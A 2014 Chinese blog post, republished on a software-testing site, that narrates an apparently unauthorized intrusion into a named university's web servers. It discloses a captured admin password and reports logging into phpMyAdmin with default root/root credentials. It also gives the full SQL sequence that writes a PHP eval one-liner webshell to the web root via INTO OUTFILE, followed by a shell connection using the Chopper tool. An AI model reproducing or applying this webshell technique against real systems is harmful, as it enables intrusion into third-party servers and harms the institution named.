渗透测试笔记

发表于:2014-4-23 11:14

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:milantgh    来源:51Testing软件测试网采编

  今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码
  账号:admin
  密码:abc123456
  但是,找来找去找不到后台,就让我提权试试。
  我看了下:http://pxc.ncist.edu.cn/dede/
  后台被删除了!怎么办??
  google hack也没找到后台
  后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin
  输入默认MySql账号与密码:
  账号:root
  密码:root
  居然进去了:
  接下来就是phpmyadmin提权了:
  我的思路是:
  1.先爆出php服务器www的路径
  2.然后通过将php一句话插入数据库再导出到www路径
  通过google hack爆到路径:D\www\
  呵呵,接下来就执行sql语句:
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );
INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');
SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';
  这段sql意思是:
  1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1
  2.将php一句话木马插入数据库中的xss1字段处
  3.将数据库中xss1字段的内容导出到d:\www\x.php文件中
  这下,通过chopper连接x.php小马得到shell
21/212>
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号